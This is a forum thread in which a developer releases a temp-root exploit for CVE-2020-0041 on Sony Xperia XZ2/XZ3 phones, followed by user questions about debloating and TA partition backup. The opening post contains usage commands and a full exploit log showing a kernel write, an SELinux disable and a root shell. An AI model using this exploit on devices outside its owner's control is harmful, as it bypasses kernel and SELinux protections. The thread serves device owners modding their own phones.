FORUMS

[XZ2/XZ2c/XZ2p/XZ3] temp root exploit via CVE-2020-0041 including magisk setup

1,204 posts
Thanks Meter: 2,329
 
By j4nn, Recognized Developer on 13th May 2020, 11:55 PM
Post Reply Email Thread
temp root exploit for sony xperia XZ2/XZ2c/XZ2p/XZ3 with android 10 firmware
including temporal magisk setup from the exploit

The exploit uses CVE-2020-0041 originally designed for Pixel 3 running kernel 4.9.
I have adapted the Pixel 3 specific exploit for kernel 4.9 that is used with sony TAMA platform phones running Android 10 with February 2020 security patch level.

SUPPORTED TARGETSThis has been tested only with xperia XZ2 H8216-52.1.A.0.618 target, but support for other targets have been implemented based on analysis of each kernel image from target firmware.
Please note, it is unlikely that any other fw version than those listed above would work.
The only (unlikely) case when the exploit could work with different fw version (or different phone model) would be that they would use binary identical kernel image in the firmware.

USAGE HOWTO INCLUDING MAGISK SETUP
  • be sure to run supported firmware version on your phone (you may need to downgrade, involving factory reset)
  • enable developer mode options and in there adb debugging (eventually install adb drivers)
  • download the tama-mroot.zip with the exploit attached in this post
  • download Magisk-v20.4.zip from magisk releases page on github here
  • use 'adb push tama-mroot.zip Magisk-v20.4.zip /data/local/tmp' to copy the zips to the phone
  • unzip and prepare magisk setup with following commands in 'adb shell'
    Code:
    cd /data/local/tmp
    unzip tama-mroot.zip
    chmod 755 tama-mroot magisk-setup.sh magisk-start.sh
    ./magisk-setup.sh
  • get temp root and start magisk up with following commands in 'adb shell':
    Code:
    cd /data/local/tmp
    ./tama-mroot
    ./magisk-start.sh -1
    ./magisk-start.sh -2
    ./magisk-start.sh -3

If it worked, you should see something like this:

Code:
H8216:/ $ cd /data/local/tmp
H8216:/data/local/tmp $ ./tama-mroot                                                                                                                                                                             
[+] Detected H8216-52.1.A.0.618 target
[+] Mapped 200000
[+] selinux_enforcing before exploit: 1
[+] pipe file: 0xffffffd07822fa00
[+] file epitem at ffffffd102da6d00
[+] Reallocating content of 'write8_inode' with controlled data...............[DONE]
[+] Overwriting 0xffffffd07822fa20 with 0xffffffd102da6d50...[DONE]
[+] Write done, should have arbitrary read now.
[+] file operations: ffffff9dee01ebf8
[+] kernel base: ffffff9dece80000
[+] Reallocating content of 'write8_selinux' with controlled data..[DONE]
[+] Overwriting 0xffffff9def290000 with 0x0...[DONE]
[+] init_cred: ffffff9def02fcd0
[+] memstart_addr: 0xfffffff040000000
[+] First level entry: ae7f6003 -> next table at ffffffd06e7f6000
[+] Second level entry: ae419003 -> next table at ffffffd06e419000
[+] sysctl_table_root = ffffff9def05c710
[+] Reallocating content of 'write8_sysctl' with controlled data.......[DONE]
[+] Overwriting 0xffffffd1316fc268 with 0xffffffd0ba748000...[DONE]
[+] Injected sysctl node!
[+] Node write8_inode, pid 7109, kaddr ffffffd0c1193700
[+] Replaced sendmmsg dangling reference
[+] Replaced sendmmsg dangling reference
[+] Replaced sendmmsg dangling reference
[+] Node write8_selinux, pid 6726, kaddr ffffffd08bfeb400
[+] Replaced sendmmsg dangling reference
[+] Replaced sendmmsg dangling reference
[+] Replaced sendmmsg dangling reference
[+] Node write8_sysctl, pid 6772, kaddr ffffffd0afc0d000
[+] Replaced sendmmsg dangling reference
[+] Replaced sendmmsg dangling reference
[+] Replaced sendmmsg dangling reference
[+] Cleaned up sendmsg threads
[+] epitem.next = ffffffd07822fa20
[+] epitem.prev = ffffffd07822fad8
[+] Launching privileged shell
root_by_cve-2020-0041:/data/local/tmp # ./magisk-start.sh -1                                                                                                                                                     
+ FRESH=false 
+ '[' -1 '=' --fresh ']'
+ '[' ! -e /data/adb/magisk/busybox ']'
+ ./magiskpolicy --live --magisk 'allow dumpstate * * *'
Load policy from: /sys/fs/selinux/policy
root_by_cve-2020-0041:/data/local/tmp # ./magisk-start.sh -2                                                                                                                                                     
+ FRESH=false 
+ '[' -2 '=' --fresh ']'
+ '[' ! -e /data/adb/magisk/busybox ']'
+ STAGE=2 
+ '[' 2 '=' 2 ']'
+ mount -t tmpfs -o 'mode=755' none /sbin
+ chcon u:object_r:rootfs:s0 /sbin
+ chmod 755 /sbin
+ cp -a magisk/boot_patch.sh /sbin
+ cp -a magisk/magiskboot /sbin
+ cp -a magisk/magiskinit64 /sbin
+ cp -a magisk/busybox /sbin
+ cp -a magisk/util_functions.sh /sbin
+ cd /sbin
+ chmod 755 boot_patch.sh busybox magiskboot magiskinit64 util_functions.sh
+ mkdir r
+ mount -o bind / r
+ cp -a r/sbin/. /sbin
+ umount r
+ rmdir r
+ mv magiskinit64 magiskinit
+ ./magiskinit -x magisk magisk
+ ln -s /sbin/magiskinit /sbin/magiskpolicy
+ ln -s /sbin/magiskinit /sbin/supolicy
+ false
+ chcon -R u:object_r:magisk_file:s0 /data/adb/magisk
+ rm -f magiskboot util_functions.sh boot_patch.sh
+ ln -s /sbin/magisk /sbin/su
+ ln -s /sbin/magisk /sbin/resetprop
+ ln -s /sbin/magisk /sbin/magiskhide
+ mkdir /sbin/.magisk
+ chmod 755 /sbin/.magisk
+ >/sbin/.magisk/config 
+ echo 'KEEPVERITY=true'
+ >>/sbin/.magisk/config 
+ echo 'KEEPFORCEENCRYPT=true'
+ chmod 000 /sbin/.magisk/config
+ mkdir -p /sbin/.magisk/busybox
+ chmod 755 /sbin/.magisk/busybox
+ mv busybox /sbin/.magisk/busybox
+ mkdir -p /sbin/.magisk/mirror
+ chmod 000 /sbin/.magisk/mirror
+ mkdir -p /sbin/.magisk/block
+ chmod 000 /sbin/.magisk/block
+ mkdir -p /sbin/.magisk/modules
+ chmod 755 /sbin/.magisk/modules
+ mkdir -p /data/adb/modules
+ chmod 755 /data/adb/modules
+ mkdir -p /data/adb/post-fs-data.d
+ chmod 755 /data/adb/post-fs-data.d
+ mkdir -p /data/adb/service.d
+ chmod 755 /data/adb/service.d
+ chcon -R -h u:object_r:rootfs:s0 /sbin/.magisk
+ chcon u:object_r:magisk_file:s0 /sbin/.magisk/busybox/busybox
+ /sbin/magisk --daemon
client: launching new main daemon process
+ pidof magiskd
+ MP=14148 
+ '[' -z 14148 ']'
+ >/sbin/.magisk/escalate 
+ echo 14148
+ '[' -e /sbin/.magisk/escalate ']'
+ sleep 1
+ '[' -e /sbin/.magisk/escalate ']'
root_by_cve-2020-0041:/data/local/tmp # ./magisk-start.sh -3                                                                                                                                                     
+ FRESH=false 
+ '[' -3 '=' --fresh ']'
+ '[' ! -e /data/adb/magisk/busybox ']'
+ STAGE=3 
+ '[' 3 '=' 2 ']'
+ >/sbin/.magisk/magiskd 
+ echo -e '#!/system/bin/sh\n/sbin/magisk --daemon'
+ chmod 755 /sbin/.magisk/magiskd
+ chcon u:object_r:dumpstate_exec:s0 /sbin/.magisk/magiskd
+ getprop init.svc.dumpstate
+ SVC='' 
+ timeout=10 
+ '[' 10 -gt 0 ']'
+ stop dumpstate
+ killall -9 magiskd
+ stop dumpstate
+ mount -o bind /sbin/.magisk/magiskd /system/bin/dumpstate
+ start dumpstate
+ timeout=10 
+ '[' 10 -le 0 ']'
+ pidof magiskd
+ MP=14165 
+ '[' -n 14165 ']'
+ break
+ stop dumpstate
+ sleep 1
+ umount /system/bin/dumpstate
+ rm -f /sbin/.magisk/magiskd
+ '[' '' '=' running ']'
+ rm -f /dev/.magisk_unblock
+ /sbin/magisk --post-fs-data
+ timeout=10 
+ '[' -e /dev/.magisk_unblock -o 10 -le 0 ']'
+ sleep 1
+ timeout=9 
+ '[' -e /dev/.magisk_unblock -o 9 -le 0 ']'
+ /sbin/magisk --service
+ sleep 1
+ /sbin/magisk --boot-complete
+ chmod 751 /sbin
root_by_cve-2020-0041:/data/local/tmp # id                                                                                                                                                                       
uid=0(root) gid=0(root) groups=0(root),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats),3009(readproc),3011(uhid) context=u:r:magisk:s0
root_by_cve-2020-0041:/data/local/tmp # uname -a
Linux localhost 4.9.186-perf+ #1 SMP PREEMPT Fri Jan 17 01:22:05 2020 aarch64
root_by_cve-2020-0041:/data/local/tmp # getenforce                                                                                                                                                               
Permissive


Now you can exit the temp root shell and use 'su' to get a root shell controlled by magisk manager or allow other apps that need root as asking for root permission now works.
The magisk setup from exploit including working permission asking has been fully developed by me, it uses some novel techniques to overcome the limitations caused by magisk run from a temp root instead of being integrated in boot process as a service.

Please be careful what you use the temp root for.
Changing something in partitions protected by dm-verity (or Android Verified Boot 2.0), like for example /system, /vendor or kernel boot image, can result with a not anymore booting phone.
This is why it is called 'temp root' - you get a root shell only temporarily, it is lost with reboot and it does not allow to make permanent changes in crucial partitions - you would need to unlock bootloader for that.
Some partitions might still be possible to modify - for example in case of sony xperia xz1 phones it was possible to do permanent debloat via changes in /oem partition and such debloat would survive even factory reset. Similarly some modem configs have been present in /oem allowing to setup IMS for different operators/regions or tune other modem related stuff.

Please note, this exploit will get you a root shell with still locked TAMA platform phones that could allow to backup TA partition in still locked state, having drm keys (the device key) still there. Backup of TA partition now works with tama-mroot avoiding 'Required key not available' you could experience with previously released tama-root.
There is currently no known method though how to restore drm functionalities after bootloader unlock even after restoring TA partition from the locked state backup.
For details please check exploiting xperia XZ2 - good and bad news post and following discussion there.

SOURCES
Exploit sources for all releases are available at my github here.

CREDITS
Big thanks to Blue Frost Security for the excellent writeup and the exploit itself.

DONATIONS
If you like my work, you can donate using the Donate to Me button with several methods there.
Thank you very much to all who donate.

DOWNLOAD
Attached Files
File Type: zip tama-root.zip - [Click for QR Code] (17.8 KB, 416 views)
File Type: zip tama-mroot.zip - [Click for QR Code] (20.9 KB, 396 views)
The Following 23 Users Say Thank You to j4nn For This Useful Post: [ View ]
13th May 2020, 11:56 PM |#2  
OP Recognized Developer
Thanks Meter: 2,329
 
Donate to Me
More
CHANGELOG
  • 2020-05-14 : released initial version of tama-root (no magisk support, problem with 'Required key not available' returned from some commands)
  • 2020-05-22 : finally got magisk from temp root working including permission asking feature - released as tama-mroot.zip
The Following 3 Users Say Thank You to j4nn For This Useful Post: [ View ]
14th May 2020, 03:05 AM |#3  
serajr's Avatar
Recognized Developer / Recognized Themer
Flag São Paulo - SP
Thanks Meter: 18,738
 
Donate to Me
More
So you did it again! You are insane mate!!
Respect.
The Following 4 Users Say Thank You to serajr For This Useful Post: [ View ]
14th May 2020, 05:17 PM |#4  
teostar's Avatar
Senior Member
Thanks Meter: 54
 
More
Relative noob here, I have a few questions with temporary root,
1- can I remove preinstalled apps e.g. I want to remove the preinstalled FB app,would it reappear after a reboot?
2- would this wipe our phones?
3- would it affect the camera etc

Thanks in advance.
14th May 2020, 08:53 PM |#5  
OP Recognized Developer
Thanks Meter: 2,329
 
Donate to Me
More
@teostar, you may also check this thread for the answers.
Particularly post#5 may be applicable for tama too (did not check/test though).
The Following User Says Thank You to j4nn For This Useful Post: [ View ]
17th May 2020, 04:26 AM |#6  
Senior Member
Thanks Meter: 12
 
More
So who's gonna go first? I'm interested to know if an ad block app like adaway can be installed now that modifies the hosts files. Or can I use titanium backup to backup/restore an app+data? There was an app I used to use via Xposed that let YouTube play in background as well, perhaps I can backup that app from old phone and restore it on my xz2c?

Edit: tried it, it works on my XZ2C H8314 on Verizon. Not sure what to do with it though. Seems that it just gives me a shell with root, dunno how that helps me get an app installed that needs root like adaway unless somehow I figure out what adaway app does behind the scenes and do it manually through the root shell?
17th May 2020, 11:01 PM |#7  
Senior Member
Thanks Meter: 12
 
More
well that didn't work, i guess the hosts file is in /system/etc/ so if we cant modify anything in /system then i guess even just modifying the hosts file could break something?
18th May 2020, 05:59 AM |#8  
OP Recognized Developer
Thanks Meter: 2,329
 
Donate to Me
More
@Mike7143, to provide root access to apps, root manager like magisk is needed.
It can be started from an exploit (possibly with a bit limited functionality) as shown in this thread. Unfortunately that old magisk does not work with android 10.
I tried to start up latest magisk from the exploit, but it ended with magisk manager detected magisk root alright, but I could not make sending notifications from apps to ask magisk for root permission somehow.
So currently only the shell is available, allowing for example to backup still locked TA partition.
You can do small changes in /system, but if you would not get red triangle on boot, it would possibly revert the change.
You can modify stuff in /system on runtime "system less-ly" exactly like magisk does it though, using bind mounts.
The Following User Says Thank You to j4nn For This Useful Post: [ View ]
18th May 2020, 09:54 AM |#9  
Senior Member
Thanks Meter: 138
 
More
Is this method compatible with lasted firmware? (.672)

Is this safe relock the bootloader with my backup? Nothing breaks?

Btw, amazing job! Now i think aosp project Will get more users. Hope xz3 get more popular in custom scene.
The Following User Says Thank You to bruno$0 For This Useful Post: [ View ] Gift bruno$0 Ad-Free
18th May 2020, 03:51 PM |#10  
Quote:
Originally Posted by j4nn

Some partitions might still be possible to modify - for example in case of Sony Xperia XZ1 phones it was possible to do permanent debloat via changes in /oem partition and such debloat would survive even factory reset. Similarly some modem configs have been present in /oem allowing to setup IMS for different operators/regions or tune other modem related stuff.

Thanks for mentioning the VoLTE modem config on still locked XZ1 devices! Somehow I didn't read that in the XZ1 thread. Good to know! Maybe I won't unlock the bootloader of my backup XZ1, because adding VoLTE for my German telco provider Congstar to the stock firmware is enough for my use case.

Quote:
Originally Posted by j4nn

Please note, this exploit will get you a root shell with still locked TAMA platform phones that could allow to backup TA partition in still locked state, having drm keys (the device key) still there.
There is currently no known method though how to restore drm functionalities after bootloader unlock even after restoring TA partition from the locked state backup. For details please check exploiting xperia XZ2 - good and bad news post and following discussion there.

Too bad there is no possibility to restore the TA partition on the XZ2c yet. On the XZ1 this opened the door to real freedom!
18th May 2020, 04:52 PM |#11  
Senior Member
Thanks Meter: 12
 
More
Quote:
Originally Posted by j4nn

...Good news is that I've managed to adapt the first stage and eventually have been able to backup TA partition still in locked state. But then it went south, phone complained about corruption or something, refusing to boot and just powered off with no way of recovery - except bootloader unlock, that allowed me to eventually fix it.

So... if I'm reading this right, even just backing up the TA partition on the XZ2C caused something to break, forcing you to unlock? I was thinking maybe I should figure out how to backup my TA partition as well just in case in the future there's a fix, but if it's going to break it by just backing it up, that's an issue as well.

---------- Post added at 11:52 AM ---------- Previous post was at 11:42 AM ----------

Quote:
Originally Posted by j4nn

... I tried to start up latest magisk from the exploit, but it ended with magisk manager detected magisk root alright, but I could not make sending notifications from apps to ask magisk for root permission somehow.
So currently only the shell is available, allowing for example to backup still locked TA partition.
You can do small changes in /system, but if you would not get red triangle on boot, it would possibly revert the change.
You can modify stuff in /system on runtime "system less-ly" exactly like magisk does it though, using bind mounts.

So, basically all we have is temp root via adb shell. Doesn't seem that magisk works. I guess I'm not sure what you mean by "small" changes in /system, what is "small"? Coming from a 2013 Moto X developer edition that I could do anything with I'm really missing adaway and youtube adaway on my new XZ2C H8314. Not sure if modifying my hosts file would be considered small or not, and that doesn't take care of youtube adaway of which I'm not even sure how that works. DNS666 seems to be an alternative to adaway but it's not taking care of youtube.

Regarding modifying /system "system-lessly", I'll admit I'm a rookie when it comes to this stuff, I either have a lot to learn/read up on or wait for an easier to use app/workaround.

It seems like in your XZ1C post you and others were working on getting the XZ2C sorted out but since decided to go back and focus on the XZ1C?
Post Reply Subscribe to Thread

Guest Quick Reply (no urls or BBcode)
Message:
Previous Thread Next Thread
Thread Tools Search this Thread
Search this Thread:

Advanced Search
Display Modes